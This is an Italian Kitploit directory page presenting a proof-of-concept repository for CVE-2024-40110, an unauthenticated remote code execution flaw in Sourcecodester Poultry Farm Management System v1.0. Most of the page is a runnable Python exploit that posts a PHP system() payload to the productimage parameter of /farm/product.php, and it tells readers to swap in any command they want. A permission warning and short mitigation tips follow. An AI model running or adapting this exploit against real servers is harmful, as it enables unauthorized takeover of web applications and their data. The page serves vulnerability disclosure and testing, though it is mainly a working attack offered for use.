Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/abdurahmon3236/cve-2024-40110
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Script proof-of-concept che dimostra l'esecuzione remota di codice non autenticata in Sourcecodester Poultry Farm Management System tramite il parametro productimage vulnerabile.

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Proof of Concept (PoC) per Esecuzione di Codice Remota non Autenticata in Sourcecodester Poultry Farm Management System v1.0

Questo repository contiene uno script Proof of Concept (PoC) che dimostra una vulnerabilità di esecuzione di codice remota (RCE) non autenticata in Sourcecodester Poultry Farm Management System v1.0. La vulnerabilità è presente nel parametro productimage all'indirizzo /farm/product.php e consente a un attaccante di eseguire codice arbitrario sul server.

Indice

  • Descrizione della Vulnerabilità
  • Configurazione e Utilizzo
    • Script PoC
  • Considerazioni Importanti
  • Mitigazione

Descrizione della Vulnerabilità

CVE-ID: (In attesa di assegnazione)

Panoramica: Sourcecodester Poultry Farm Management System v1.0 contiene una vulnerabilità di esecuzione di codice remota (RCE) non autenticata tramite il parametro productimage all'indirizzo . Questa vulnerabilità consente a un attaccante di eseguire codice arbitrario sul server senza autenticazione.

/farm/product.php

Versione Affetta:

  • Sourcecodester Poultry Farm Management System v1.0

Configurazione e Utilizzo

Prerequisiti

  • Python 3.x
  • libreria requests (pip install requests)

Script PoC

Questo script dimostra come un attaccante possa sfruttare la vulnerabilità RCE inviando una richiesta dannosa al parametro vulnerabile.

Salva il seguente script come rce_poc.py ed eseguilo.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

Spiegazione

  1. Configurazione: Imposta target_url sull'URL dell'endpoint /farm/product.php del server vulnerabile.
  2. Payload: Il payload è un semplice payload di esecuzione di comandi PHP. Puoi modificare il payload per eseguire comandi diversi secondo necessità.
  3. Costruzione della Richiesta: Lo script costruisce una richiesta POST con il payload dannoso nel parametro productimage.
  4. Funzione di Exploit: La funzione exploit_rce() invia la richiesta dannosa all'URL di destinazione e stampa i dettagli della risposta.
  5. Esecuzione dello Script: Quando eseguito, lo script tenterà di sfruttare la vulnerabilità RCE e stamperà i risultati.

Considerazioni Importanti

  • Permessi: Assicurati di avere il permesso esplicito per testare questa vulnerabilità sul sistema di destinazione. I test non autorizzati sono illegali e non etici.
  • Ambiente di Test: Esegui questo test in un ambiente controllato per evitare di impattare i sistemi di produzione.
  • Personalizzazione del Payload: Personalizza il payload secondo necessità per ottenere l'esecuzione del comando desiderato.

Mitigazione

Per mitigare questa vulnerabilità, applica i seguenti passaggi:

  • Validazione degli Input: Implementa una corretta validazione degli input per sanitizzare gli input degli utenti.
  • Restrizioni sul Caricamento di File: Limita il caricamento dei file a tipi specifici e imponi limiti di dimensione.
  • Aggiornamento del Software: Aggiorna regolarmente il tuo software all'ultima versione per applicare patch e correzioni di sicurezza.

Seguendo questi passaggi di mitigazione e le migliori pratiche di sicurezza, puoi prevenire vulnerabilità come questo problema RCE in Sourcecodester Poultry Farm Management System v1.0.

Scarica lo strumento